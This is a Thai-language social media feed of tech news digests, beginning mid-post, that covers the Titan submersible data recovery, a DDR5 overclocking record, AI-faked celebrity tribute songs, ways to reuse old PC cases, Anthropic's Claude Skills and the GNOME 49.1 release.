และการใช้พลังงานสูงกว่านี้อาจทำลายข้อมูลที่เหลืออยู่ ทีมงานจึงส่งต่อซากไปยังห้องแล็บของ ATF ซึ่งสามารถแยกแผง SSD ออกมาได้ 2 แผง แต่พบว่าชิปหน่วยความจำเสียหายอย่างหนัก—บางชิปหายไป บางชิปแตกร้าว และไม่มีข้อมูลใดสามารถกู้คืนได้ ✅ สภาพของระบบคอมพิวเตอร์หลังเหตุการณ์ ➡️ พีซี Nuvo-5000LP จำนวน 3 เครื่องถูกบดขยี้รวมกันเป็นก้อนโลหะหนัก ~45 กิโลกรัม ➡️ ทำหน้าที่บันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก ➡️ กล้องและอุปกรณ์อื่น ๆ เสียหายเกือบทั้งหมด ยกเว้นการ์ด SD ที่รอดมาได้ในเหตุการณ์อื่น ✅ การสแกนและกู้ข้อมูล ➡️ ใช้ CT scan เพื่อตรวจหาชิปหน่วยความจำที่อาจรอด ➡️ ไม่พบช่องว่างที่ชิปอาจอยู่รอดได้ ➡️ หลีกเลี่ยงการใช้พลังงานสูงในการสแกนเพื่อไม่ให้ข้อมูลเสียหาย ✅ การวิเคราะห์โดย ATF ➡️ แยกแผง SSD ได้ 2 แผงจากซากโลหะ ➡️ พบว่าชิปหน่วยความจำบางส่วนหายไป และบางส่วนแตกร้าว ➡️ ไม่สามารถกู้ข้อมูลใด ๆ ได้จากแผงที่เหลือ ‼️ คำเตือนจากการออกแบบระบบ ⛔ การใช้พีซีแบบ fanless อาจไม่ทนต่อแรงดันและความร้อนจากการระเบิด ⛔ ไม่มีระบบป้องกันข้อมูลในกรณีฉุกเฉินหรือการระเบิด ⛔ การออกแบบระบบเก็บข้อมูลควรคำนึงถึงการกู้คืนหลังภัยพิบัติ 📎 สาระเพิ่มเติมจากภายนอก: ✅ ความท้าทายในการกู้ข้อมูลจากอุปกรณ์ที่เสียหาย ➡️ SSD มีโครงสร้างที่ซับซ้อนและเปราะบางต่อแรงกระแทก ➡️ การกู้ข้อมูลต้องใช้เทคนิคระดับสูง เช่น การสกัดชิปและอ่านข้อมูลโดยตรงจาก NAND ✅ บทเรียนจาก Titan สำหรับการออกแบบระบบใต้น้ำ ➡️ ควรมีระบบบันทึกข้อมูลซ้ำในหลายตำแหน่ง ➡️ ใช้วัสดุที่ทนแรงดันและความร้อนสูง ➡️ ออกแบบให้สามารถกู้คืนข้อมูลได้แม้ในกรณีที่โครงสร้างหลักเสียหาย https://www.tomshardware.com/tech-industry/oceangate-titan-computers-crushed-into-twisted-mass-of-metal-and-electronics-during-catastrophic-implosion-investigators-find-signs-of-thermal-damage-too
    0 ความคิดเห็น 0 การแบ่งปัน 146 มุมมอง 0 รีวิว
  • “DDR5 ทะลุ 13,000 MT/s ครั้งแรก!” — Corsair Vengeance และ GIGABYTE Z890 สร้างสถิติใหม่ในโลกการโอเวอร์คล็อก

    ในโลกของการโอเวอร์คล็อก หนึ่งในเป้าหมายที่นักเล่นระดับสูงไล่ล่ามานานคือการทำให้ DDR5 ทะลุความเร็ว 13,000 MT/s และล่าสุดก็มีคนทำสำเร็จแล้ว! นักโอเวอร์คล็อกชาวเยอรมันชื่อ “sergmann” ได้สร้างสถิติใหม่ด้วย Corsair Vengeance DDR5 บนเมนบอร์ด GIGABYTE Z890 Aorus Tachyon ICE โดยจับคู่กับซีพียู Intel Core Ultra 9 285K และใช้ไนโตรเจนเหลวในการระบายความร้อน

    ก่อนหน้านี้ “saltycroissant” เคยทำสถิติไว้ที่ 12,920 MT/s และเกือบจะทะลุ 13,000 MT/s แต่ sergmann แซงหน้าไปด้วยความเร็ว 13,010 MT/s ซึ่งได้รับการยืนยันจาก HWBot และ CPU-Z

    แม้ความเร็วจะสูงมาก แต่ latency ก็สูงเช่นกัน (CL68-127-127-127-2) ทำให้ไม่เหมาะกับการใช้งานทั่วไป แต่ถือเป็นชัยชนะเชิงเทคนิคที่แสดงถึงศักยภาพของฮาร์ดแวร์ยุคใหม่ โดยเฉพาะเมนบอร์ด Z890 และหน่วยความจำ DDR5 รุ่นล่าสุด

    ข้อมูลในข่าว
    DDR5 ถูกโอเวอร์คล็อกทะลุ 13,000 MT/s เป็นครั้งแรก
    นักโอเวอร์คล็อก “sergmann” ใช้ Corsair Vengeance DDR5 และ GIGABYTE Z890 Aorus Tachyon ICE
    ซีพียูที่ใช้คือ Intel Core Ultra 9 285K
    ใช้ไนโตรเจนเหลวในการระบายความร้อน
    ความเร็วที่ทำได้คือ 13,010 MT/s (6504 MHz)
    ได้รับการยืนยันจาก HWBot และ CPU-Z
    ค่า latency อยู่ที่ CL68-127-127-127-2
    IMC to Memory Clock ratio อยู่ที่ 3:190
    ความเร็วระดับนี้ไม่เหมาะกับการใช้งานทั่วไป แต่เป็นการโชว์ศักยภาพ
    เมนบอร์ด Z890 และซีพียู Ultra 200S มี memory controller ที่รองรับความเร็วสูง
    Corsair, Gigabyte, Seasonic และ ThermalGrizzly มีส่วนสนับสนุนการทดสอบ

    https://wccftech.com/ddr5-memory-officially-pushed-over-13000-mt-s-for-the-first-time/
    🚀 “DDR5 ทะลุ 13,000 MT/s ครั้งแรก!” — Corsair Vengeance และ GIGABYTE Z890 สร้างสถิติใหม่ในโลกการโอเวอร์คล็อก ในโลกของการโอเวอร์คล็อก หนึ่งในเป้าหมายที่นักเล่นระดับสูงไล่ล่ามานานคือการทำให้ DDR5 ทะลุความเร็ว 13,000 MT/s และล่าสุดก็มีคนทำสำเร็จแล้ว! นักโอเวอร์คล็อกชาวเยอรมันชื่อ “sergmann” ได้สร้างสถิติใหม่ด้วย Corsair Vengeance DDR5 บนเมนบอร์ด GIGABYTE Z890 Aorus Tachyon ICE โดยจับคู่กับซีพียู Intel Core Ultra 9 285K และใช้ไนโตรเจนเหลวในการระบายความร้อน ก่อนหน้านี้ “saltycroissant” เคยทำสถิติไว้ที่ 12,920 MT/s และเกือบจะทะลุ 13,000 MT/s แต่ sergmann แซงหน้าไปด้วยความเร็ว 13,010 MT/s ซึ่งได้รับการยืนยันจาก HWBot และ CPU-Z แม้ความเร็วจะสูงมาก แต่ latency ก็สูงเช่นกัน (CL68-127-127-127-2) ทำให้ไม่เหมาะกับการใช้งานทั่วไป แต่ถือเป็นชัยชนะเชิงเทคนิคที่แสดงถึงศักยภาพของฮาร์ดแวร์ยุคใหม่ โดยเฉพาะเมนบอร์ด Z890 และหน่วยความจำ DDR5 รุ่นล่าสุด ✅ ข้อมูลในข่าว ➡️ DDR5 ถูกโอเวอร์คล็อกทะลุ 13,000 MT/s เป็นครั้งแรก ➡️ นักโอเวอร์คล็อก “sergmann” ใช้ Corsair Vengeance DDR5 และ GIGABYTE Z890 Aorus Tachyon ICE ➡️ ซีพียูที่ใช้คือ Intel Core Ultra 9 285K ➡️ ใช้ไนโตรเจนเหลวในการระบายความร้อน ➡️ ความเร็วที่ทำได้คือ 13,010 MT/s (6504 MHz) ➡️ ได้รับการยืนยันจาก HWBot และ CPU-Z ➡️ ค่า latency อยู่ที่ CL68-127-127-127-2 ➡️ IMC to Memory Clock ratio อยู่ที่ 3:190 ➡️ ความเร็วระดับนี้ไม่เหมาะกับการใช้งานทั่วไป แต่เป็นการโชว์ศักยภาพ ➡️ เมนบอร์ด Z890 และซีพียู Ultra 200S มี memory controller ที่รองรับความเร็วสูง ➡️ Corsair, Gigabyte, Seasonic และ ThermalGrizzly มีส่วนสนับสนุนการทดสอบ https://wccftech.com/ddr5-memory-officially-pushed-over-13000-mt-s-for-the-first-time/
    WCCFTECH.COM
    It's Official: DDR5 Speed Pushed Over 13000 MT/s For The First Time With Corsair Vengeance Memory
    For the first time ever, an overclocker has broke the 13010 MT/s barrier on DDR5 memory, making a new world record.
    0 ความคิดเห็น 0 การแบ่งปัน 128 มุมมอง 0 รีวิว
  • “AI ปลอมเสียงศิลปินดังในคลิปไว้อาลัย Charlie Kirk” — เมื่อ YouTube กลายเป็นเวทีของบทเพลงที่ไม่มีใครร้องจริง

    ผู้ใช้ YouTube หลายคนตกใจเมื่อพบคลิปไว้อาลัย Charlie Kirk นักเคลื่อนไหวฝ่ายขวาที่ถูกลอบสังหาร โดยมีเสียงร้องจากศิลปินดังอย่าง Adele, Ed Sheeran และ Justin Bieber — แต่ทั้งหมดเป็นเสียงที่สร้างจาก AI โดยไม่มีการร้องจริงหรือรับรู้จากเจ้าตัว

    คลิปเหล่านี้ใช้ภาพประกอบที่ดูสมจริง เช่น thumbnails ที่ศิลปินร้องไห้ พร้อมเนื้อเพลงที่แต่งขึ้นจาก prompt เช่น “The angels sing your name” หรือ “Your story’s written in the stars” ซึ่งสร้างความซาบซึ้งให้ผู้ชมจำนวนมาก แม้เสียงจะไม่เหมือนต้นฉบับก็ตาม

    AI music generators อย่าง Suno สามารถสร้างเพลงจากข้อความง่าย ๆ เช่น “ทำเพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้” หรือ “เพลงแนว house เกี่ยวกับลาออกจากงาน” และเมื่อสื่อ AFP ทดสอบด้วย prompt ไว้อาลัยนักเคลื่อนไหว ก็ได้เพลงชื่อ “Star Gone Too Soon” และ “Echoes of a Flame” ภายในไม่กี่วินาที

    แม้ YouTube จะมีนโยบายให้ผู้สร้างเนื้อหาต้องเปิดเผยว่าใช้ AI แต่หลายคลิปกลับซ่อนข้อมูลไว้ในคำอธิบายที่ต้องคลิกขยายถึงจะเห็น

    นักวิจารณ์เช่น Alex Mahadevan จาก Poynter เตือนว่า “อินเทอร์เน็ตที่เคยเต็มไปด้วยคนสร้างสรรค์กำลังถูกแทนที่ด้วย AI slop ที่สร้างเพื่อเงิน” และ Lucas Hansen จาก CivAI เสริมว่า “การลอกเลียนเสียงและภาพควรได้รับการคุ้มครอง แม้จะเป็นคนที่เสียชีวิตแล้วก็ตาม”

    ข้อมูลในข่าว
    คลิปไว้อาลัย Charlie Kirk ใช้เสียง AI ปลอมเป็นศิลปินดัง
    มี thumbnails ปลอม เช่นภาพศิลปินร้องไห้
    เนื้อเพลงสร้างจาก prompt เช่น “Your story’s written in the stars”
    AI music generators อย่าง Suno สร้างเพลงจากข้อความได้ภายในวินาที
    YouTube มีนโยบายให้เปิดเผยการใช้ AI แต่หลายคลิปซ่อนข้อมูลไว้
    คลิปเหล่านี้มีผู้ชมหลายล้านและคอมเมนต์ขอบคุณศิลปินที่ไม่ได้ร้องจริง
    Alex Mahadevan เตือนว่าอินเทอร์เน็ตกำลังถูกแทนที่ด้วย “AI slop”
    Lucas Hansen เสนอให้คุ้มครองเสียงและภาพของบุคคล แม้จะเสียชีวิตแล้ว
    The Velvet Sundown วง AI บน Spotify มีผู้ฟังเกิน 200,000 คน
    Suno เสนอ prompt เช่น “เพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้”

    https://www.thestar.com.my/tech/tech-news/2025/10/17/youtube-users-trip-over-fake-ai-tributes-to-charlie-kirk
    🎤 “AI ปลอมเสียงศิลปินดังในคลิปไว้อาลัย Charlie Kirk” — เมื่อ YouTube กลายเป็นเวทีของบทเพลงที่ไม่มีใครร้องจริง ผู้ใช้ YouTube หลายคนตกใจเมื่อพบคลิปไว้อาลัย Charlie Kirk นักเคลื่อนไหวฝ่ายขวาที่ถูกลอบสังหาร โดยมีเสียงร้องจากศิลปินดังอย่าง Adele, Ed Sheeran และ Justin Bieber — แต่ทั้งหมดเป็นเสียงที่สร้างจาก AI โดยไม่มีการร้องจริงหรือรับรู้จากเจ้าตัว คลิปเหล่านี้ใช้ภาพประกอบที่ดูสมจริง เช่น thumbnails ที่ศิลปินร้องไห้ พร้อมเนื้อเพลงที่แต่งขึ้นจาก prompt เช่น “The angels sing your name” หรือ “Your story’s written in the stars” ซึ่งสร้างความซาบซึ้งให้ผู้ชมจำนวนมาก แม้เสียงจะไม่เหมือนต้นฉบับก็ตาม AI music generators อย่าง Suno สามารถสร้างเพลงจากข้อความง่าย ๆ เช่น “ทำเพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้” หรือ “เพลงแนว house เกี่ยวกับลาออกจากงาน” และเมื่อสื่อ AFP ทดสอบด้วย prompt ไว้อาลัยนักเคลื่อนไหว ก็ได้เพลงชื่อ “Star Gone Too Soon” และ “Echoes of a Flame” ภายในไม่กี่วินาที แม้ YouTube จะมีนโยบายให้ผู้สร้างเนื้อหาต้องเปิดเผยว่าใช้ AI แต่หลายคลิปกลับซ่อนข้อมูลไว้ในคำอธิบายที่ต้องคลิกขยายถึงจะเห็น นักวิจารณ์เช่น Alex Mahadevan จาก Poynter เตือนว่า “อินเทอร์เน็ตที่เคยเต็มไปด้วยคนสร้างสรรค์กำลังถูกแทนที่ด้วย AI slop ที่สร้างเพื่อเงิน” และ Lucas Hansen จาก CivAI เสริมว่า “การลอกเลียนเสียงและภาพควรได้รับการคุ้มครอง แม้จะเป็นคนที่เสียชีวิตแล้วก็ตาม” ✅ ข้อมูลในข่าว ➡️ คลิปไว้อาลัย Charlie Kirk ใช้เสียง AI ปลอมเป็นศิลปินดัง ➡️ มี thumbnails ปลอม เช่นภาพศิลปินร้องไห้ ➡️ เนื้อเพลงสร้างจาก prompt เช่น “Your story’s written in the stars” ➡️ AI music generators อย่าง Suno สร้างเพลงจากข้อความได้ภายในวินาที ➡️ YouTube มีนโยบายให้เปิดเผยการใช้ AI แต่หลายคลิปซ่อนข้อมูลไว้ ➡️ คลิปเหล่านี้มีผู้ชมหลายล้านและคอมเมนต์ขอบคุณศิลปินที่ไม่ได้ร้องจริง ➡️ Alex Mahadevan เตือนว่าอินเทอร์เน็ตกำลังถูกแทนที่ด้วย “AI slop” ➡️ Lucas Hansen เสนอให้คุ้มครองเสียงและภาพของบุคคล แม้จะเสียชีวิตแล้ว ➡️ The Velvet Sundown วง AI บน Spotify มีผู้ฟังเกิน 200,000 คน ➡️ Suno เสนอ prompt เช่น “เพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้” https://www.thestar.com.my/tech/tech-news/2025/10/17/youtube-users-trip-over-fake-ai-tributes-to-charlie-kirk
    WWW.THESTAR.COM.MY
    YouTube users trip over fake AI tributes to Charlie Kirk
    Rapidly evolving artificial intelligence tools can now create songs from simple text prompts, mimicking the voices of celebrity artists to produce tributes or entire performances on demand, often without their knowledge or consent.
    0 ความคิดเห็น 0 การแบ่งปัน 169 มุมมอง 0 รีวิว
  • “5 วิธีแปลงเคสคอมเก่าให้กลายเป็นของใช้สุดเจ๋ง” — จากสวนพกพาไปจนถึงเตาย่างบาร์บีคิว

    หากคุณมีเคสคอมพิวเตอร์เก่าที่ไม่ได้ใช้งานแล้ว อย่าเพิ่งรีบเอาไปทิ้ง! บทความจาก SlashGear แนะนำ 5 วิธีสุดสร้างสรรค์ในการนำเคสเก่ากลับมาใช้ใหม่ ไม่ว่าจะเป็นของตกแต่งบ้านหรืออุปกรณ์ใช้งานจริง โดยอาศัยความแข็งแรงของโครงสร้างเหล็กและพื้นที่ภายในที่ดัดแปลงได้หลากหลาย

    ไอเดียแปลงเคสคอมเก่า
    1. สวนพกพา (Portable Garden)
       - ติดตั้งหลอดไฟปลูกต้นไม้และพัดลมระบายอากาศ
      - ใช้ Mylar สะท้อนแสงภายใน และวางกระถางต้นไม้ขนาดเล็ก
      - เหมาะกับคนอยู่คอนโดหรือไม่มีพื้นที่ปลูกต้นไม้

    2. ตู้จดหมายแนวไอที (Novelty Mailbox)
      - ถอดชิ้นส่วนภายใน ติดตั้งฐานรอง และเจาะช่องรับจดหมาย
      - ถ้าเคสมีช่อง CD-ROM เดิม ก็ใช้เป็นช่องรับจดหมายได้เลย
      - สร้างความโดดเด่นให้หน้าบ้านแบบ geek ๆ

    3. ชั้นวางของติดผนัง (Stackable Shelving)
      - ถอดแผงด้านข้างและยึดเคสเข้ากับผนัง
      - วางซ้อนกันหลายเคสเพื่อสร้างชั้นวางแบบโมดูลาร์
      - ใช้เก็บหนังสือ ของตกแต่ง หรืออุปกรณ์อิเล็กทรอนิกส์

    4. กล่องเก็บเครื่องมือ (Tool Storage)
      - ใช้พื้นที่ภายในติดกล่องเก็บของขนาดเล็ก
      - ดัดแปลงให้มีลิ้นชักเลื่อนออกด้านหลัง
      - ติดสายสะพายเพื่อพกพาไปใช้งานนอกสถานที่

    5. เตาย่างบาร์บีคิว (Portable BBQ Grill)
      - วางถ่านในแนวนอน ติดตั้งตะแกรงย่างด้านบน
      - ใช้พัดลมของเคสควบคุมอุณหภูมิ
      - เหมาะกับการตั้งบนโต๊ะที่รองด้วยฟอยล์กันความร้อน

    https://www.slashgear.com/1999044/5-unexpected-uses-old-pc-towers/
    🖥️ “5 วิธีแปลงเคสคอมเก่าให้กลายเป็นของใช้สุดเจ๋ง” — จากสวนพกพาไปจนถึงเตาย่างบาร์บีคิว หากคุณมีเคสคอมพิวเตอร์เก่าที่ไม่ได้ใช้งานแล้ว อย่าเพิ่งรีบเอาไปทิ้ง! บทความจาก SlashGear แนะนำ 5 วิธีสุดสร้างสรรค์ในการนำเคสเก่ากลับมาใช้ใหม่ ไม่ว่าจะเป็นของตกแต่งบ้านหรืออุปกรณ์ใช้งานจริง โดยอาศัยความแข็งแรงของโครงสร้างเหล็กและพื้นที่ภายในที่ดัดแปลงได้หลากหลาย ✅ ไอเดียแปลงเคสคอมเก่า ➡️ 1. สวนพกพา (Portable Garden)    - ติดตั้งหลอดไฟปลูกต้นไม้และพัดลมระบายอากาศ   - ใช้ Mylar สะท้อนแสงภายใน และวางกระถางต้นไม้ขนาดเล็ก   - เหมาะกับคนอยู่คอนโดหรือไม่มีพื้นที่ปลูกต้นไม้ ➡️ 2. ตู้จดหมายแนวไอที (Novelty Mailbox)   - ถอดชิ้นส่วนภายใน ติดตั้งฐานรอง และเจาะช่องรับจดหมาย   - ถ้าเคสมีช่อง CD-ROM เดิม ก็ใช้เป็นช่องรับจดหมายได้เลย   - สร้างความโดดเด่นให้หน้าบ้านแบบ geek ๆ ➡️ 3. ชั้นวางของติดผนัง (Stackable Shelving)   - ถอดแผงด้านข้างและยึดเคสเข้ากับผนัง   - วางซ้อนกันหลายเคสเพื่อสร้างชั้นวางแบบโมดูลาร์   - ใช้เก็บหนังสือ ของตกแต่ง หรืออุปกรณ์อิเล็กทรอนิกส์ ➡️ 4. กล่องเก็บเครื่องมือ (Tool Storage)   - ใช้พื้นที่ภายในติดกล่องเก็บของขนาดเล็ก   - ดัดแปลงให้มีลิ้นชักเลื่อนออกด้านหลัง   - ติดสายสะพายเพื่อพกพาไปใช้งานนอกสถานที่ ➡️ 5. เตาย่างบาร์บีคิว (Portable BBQ Grill)   - วางถ่านในแนวนอน ติดตั้งตะแกรงย่างด้านบน   - ใช้พัดลมของเคสควบคุมอุณหภูมิ   - เหมาะกับการตั้งบนโต๊ะที่รองด้วยฟอยล์กันความร้อน https://www.slashgear.com/1999044/5-unexpected-uses-old-pc-towers/
    WWW.SLASHGEAR.COM
    5 Unexpected Uses For Old PC Towers - SlashGear
    Many of us have old computer parts lying around, but what are you supposed to do with old PC towers? Use your creativity, and repurpose them in unexpected ways.
    0 ความคิดเห็น 0 การแบ่งปัน 153 มุมมอง 0 รีวิว
  • “Claude Skills โดย Anthropic” — สร้าง AI ที่รู้จริงในงานของคุณ ด้วยระบบเสริมความสามารถแบบกำหนดเอง

    Anthropic เปิดตัว “Claude Skills” ซึ่งเป็นระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น โดยใช้โครงสร้างแบบ “skill folder” ที่บรรจุคำสั่ง, สคริปต์ และไฟล์ที่จำเป็น Claude จะโหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจนั้น ๆ เพื่อให้ทำงานเร็วและแม่นยำ

    Claude Skills ทำงานได้กับทุกผลิตภัณฑ์ของ Claude — ทั้ง Claude apps, Claude Code และ API โดยผู้ใช้สามารถสร้าง skill เองได้ผ่าน “skill-creator” ซึ่งเป็น skill พิเศษที่ช่วยตั้งโครงสร้างโฟลเดอร์, เขียนไฟล์ SKILL.md และจัดการ resource โดยไม่ต้องแก้ไขไฟล์ด้วยตนเอง

    ฟีเจอร์เด่นของ Claude Skills:

    Composable: Claude สามารถใช้หลาย skill พร้อมกันและประสานการทำงานอัตโนมัติ
    Portable: สร้างครั้งเดียว ใช้ได้ทุกแพลตฟอร์มของ Claude
    Efficient: โหลดเฉพาะข้อมูลที่จำเป็นเท่านั้น
    Powerful: skill สามารถมีโค้ดที่รันได้จริง ไม่ใช่แค่ข้อความคำสั่ง

    ในฝั่งนักพัฒนา API มี endpoint ใหม่ /v1/skills สำหรับจัดการเวอร์ชัน skill และต้องเปิดใช้ Code Execution Tool beta เพื่อให้ Claude รันโค้ดได้อย่างปลอดภัย

    องค์กรต่าง ๆ เช่น Box, Notion, Canva และ Rakuten ได้ใช้ Claude Skills เพื่อปรับแต่งการทำงานให้ตรงกับบริบทของตน เช่น สร้างเอกสารตามมาตรฐานองค์กร, ทำงานร่วมกับ Notion ได้เร็วขึ้น, หรือวิเคราะห์ spreadsheet ทางบัญชีได้แม่นยำ

    ข้อมูลในข่าว
    Claude Skills คือระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น
    ใช้โครงสร้าง skill folder ที่มีคำสั่ง, สคริปต์ และ resource
    Claude โหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจ
    ใช้ได้กับ Claude apps, Claude Code และ API
    “skill-creator” ช่วยสร้าง skill ได้แบบ interactive โดยไม่ต้องแก้ไฟล์เอง
    Claude สามารถใช้หลาย skill พร้อมกัน (Composable)
    สร้าง skill ครั้งเดียว ใช้ได้ทุกแพลตฟอร์ม (Portable)
    โหลดเฉพาะข้อมูลที่จำเป็น (Efficient)
    skill สามารถมีโค้ดที่รันได้จริง (Powerful)
    API มี endpoint /v1/skills สำหรับจัดการ skill
    ต้องเปิดใช้ Code Execution Tool beta เพื่อรันโค้ด
    Box ใช้ Claude สร้างเอกสารจากไฟล์ที่เก็บไว้
    Notion ใช้ Claude เพื่อลดการเขียน prompt ซับซ้อน
    Canva ใช้ Claude เพื่อสร้างดีไซน์ตามบริบททีม
    Rakuten ใช้ Claude วิเคราะห์ spreadsheet และสร้างรายงาน

    https://www.anthropic.com/news/skills
    🧠 “Claude Skills โดย Anthropic” — สร้าง AI ที่รู้จริงในงานของคุณ ด้วยระบบเสริมความสามารถแบบกำหนดเอง Anthropic เปิดตัว “Claude Skills” ซึ่งเป็นระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น โดยใช้โครงสร้างแบบ “skill folder” ที่บรรจุคำสั่ง, สคริปต์ และไฟล์ที่จำเป็น Claude จะโหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจนั้น ๆ เพื่อให้ทำงานเร็วและแม่นยำ Claude Skills ทำงานได้กับทุกผลิตภัณฑ์ของ Claude — ทั้ง Claude apps, Claude Code และ API โดยผู้ใช้สามารถสร้าง skill เองได้ผ่าน “skill-creator” ซึ่งเป็น skill พิเศษที่ช่วยตั้งโครงสร้างโฟลเดอร์, เขียนไฟล์ SKILL.md และจัดการ resource โดยไม่ต้องแก้ไขไฟล์ด้วยตนเอง ฟีเจอร์เด่นของ Claude Skills: 🧩 Composable: Claude สามารถใช้หลาย skill พร้อมกันและประสานการทำงานอัตโนมัติ 🌍 Portable: สร้างครั้งเดียว ใช้ได้ทุกแพลตฟอร์มของ Claude ⚡ Efficient: โหลดเฉพาะข้อมูลที่จำเป็นเท่านั้น 🔧 Powerful: skill สามารถมีโค้ดที่รันได้จริง ไม่ใช่แค่ข้อความคำสั่ง ในฝั่งนักพัฒนา API มี endpoint ใหม่ /v1/skills สำหรับจัดการเวอร์ชัน skill และต้องเปิดใช้ Code Execution Tool beta เพื่อให้ Claude รันโค้ดได้อย่างปลอดภัย องค์กรต่าง ๆ เช่น Box, Notion, Canva และ Rakuten ได้ใช้ Claude Skills เพื่อปรับแต่งการทำงานให้ตรงกับบริบทของตน เช่น สร้างเอกสารตามมาตรฐานองค์กร, ทำงานร่วมกับ Notion ได้เร็วขึ้น, หรือวิเคราะห์ spreadsheet ทางบัญชีได้แม่นยำ ✅ ข้อมูลในข่าว ➡️ Claude Skills คือระบบเสริมความสามารถให้ Claude ทำงานเฉพาะทางได้ดีขึ้น ➡️ ใช้โครงสร้าง skill folder ที่มีคำสั่ง, สคริปต์ และ resource ➡️ Claude โหลด skill เฉพาะเมื่อจำเป็นต่อภารกิจ ➡️ ใช้ได้กับ Claude apps, Claude Code และ API ➡️ “skill-creator” ช่วยสร้าง skill ได้แบบ interactive โดยไม่ต้องแก้ไฟล์เอง ➡️ Claude สามารถใช้หลาย skill พร้อมกัน (Composable) ➡️ สร้าง skill ครั้งเดียว ใช้ได้ทุกแพลตฟอร์ม (Portable) ➡️ โหลดเฉพาะข้อมูลที่จำเป็น (Efficient) ➡️ skill สามารถมีโค้ดที่รันได้จริง (Powerful) ➡️ API มี endpoint /v1/skills สำหรับจัดการ skill ➡️ ต้องเปิดใช้ Code Execution Tool beta เพื่อรันโค้ด ➡️ Box ใช้ Claude สร้างเอกสารจากไฟล์ที่เก็บไว้ ➡️ Notion ใช้ Claude เพื่อลดการเขียน prompt ซับซ้อน ➡️ Canva ใช้ Claude เพื่อสร้างดีไซน์ตามบริบททีม ➡️ Rakuten ใช้ Claude วิเคราะห์ spreadsheet และสร้างรายงาน https://www.anthropic.com/news/skills
    WWW.ANTHROPIC.COM
    Claude Skills: Customize AI for your workflows
    Build custom Skills to teach Claude specialized tasks. Create once, use everywhere—from spreadsheets to coding. Available across Claude.ai, API, and Code.
    0 ความคิดเห็น 0 การแบ่งปัน 106 มุมมอง 0 รีวิว
  • “GNOME 49.1 มาแล้ว!” — อัปเดตครั้งใหญ่เพื่อความเสถียร ความเข้าถึง และประสบการณ์ผู้ใช้ที่ดีขึ้น

    GNOME Project ได้ปล่อย GNOME 49.1 ซึ่งเป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia” โดยเน้นการแก้ไขบั๊กและปรับปรุงประสบการณ์ใช้งานในหลายส่วนของเดสก์ท็อป รวมถึง Nautilus, Epiphany, GNOME Shell, Mutter, Orca และ GNOME Software

    การเปลี่ยนแปลงสำคัญ ได้แก่:
    ปรับปรุง UI การจับภาพหน้าจอให้เข้าถึงง่ายขึ้น
    รองรับการพิมพ์ภาษาฮินดีแบบ Bolnagri บนคีย์บอร์ดจอสัมผัส
    ปรับปรุงไอคอนการเข้าถึงบนหน้าจอล็อกอิน
    แก้ไขปัญหาการแจ้งเตือนอัปเดตใน GNOME Software
    แก้ไขบั๊กที่ทำให้เกิด zombie process จาก gnome-session
    แก้ไขปัญหาโฟกัสคีย์บอร์ดใน Activities Overview
    แก้ไขปัญหา GTK popover submenu ที่ทำให้แอปค้าง
    แก้ไขปัญหาหน้าต่าง maximized ล้นใต้ panel
    แก้ไขการสลับ layout คีย์บอร์ดผ่าน xkb-options

    ใน Nautilus (Files):
    แก้ไขการ crash จาก callback ภายใน
    แก้ไขการ paste รูปภาพขนาดใหญ่
    ปรับปรุง contrast ของรายการที่ถูก cut
    แก้ไขการโฟกัสในหน้าต่างเลือกแอปเริ่มต้น
    แก้ไข sidebar drag-and-drop และการทดสอบ archive ที่ใช้เวลานาน

    ใน Epiphany (GNOME Web):
    ปรับปรุง address bar และ dropdown behavior
    แก้ไขการแสดงผลตัวอักษร non-Latin
    เพิ่ม OpenSearch ให้ DuckDuckGo, Bing และ Google
    แก้ไข caret position หลัง Ctrl+K
    แก้ไข favicon ที่มีพื้นหลังดำให้โปร่งใส

    ใน Orca (screen reader):
    เพิ่มการควบคุม caret สำหรับทุก text object
    เพิ่มคำสั่งใหม่ผ่าน D-Bus Remote Controller
    ปรับปรุงการอ่าน voice name และการจัดเรียงใน Preferences
    เพิ่ม OnlyShowIn=GNOME ให้ Orca autostart ได้ในเวอร์ชันเก่า

    GNOME Control Center ก็ได้รับการปรับปรุงหลาย panels เช่น Appearance, Date & Time, Mouse, Network, Users และ Wacom ส่วน GNOME Display Manager (GDM) ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง และการตรวจสอบ Wayland ที่ผิดพลาด

    ข้อมูลในข่าว
    GNOME 49.1 เป็นอัปเดตแรกของซีรีส์ GNOME 49 “Brescia”
    ปรับปรุง accessibility, multi-touch, และการจัดการคีย์บอร์ด
    แก้ไข zombie process จาก gnome-session
    Nautilus ได้รับการแก้ไขหลายจุด เช่น paste รูปภาพ, contrast, drag-and-drop
    Epiphany ปรับปรุง address bar, dropdown, และรองรับ OpenSearch
    Orca เพิ่ม caret navigation และปรับปรุง voice name presentation
    GNOME Software แก้ไขการแจ้งเตือนอัปเดต
    GNOME Control Center ปรับปรุงหลาย panels
    GDM ได้รับ hotfix สำหรับบั๊กที่ทำให้ GNOME Shell ค้าง

    https://9to5linux.com/gnome-49-1-desktop-released-with-various-improvements-and-bug-fixes
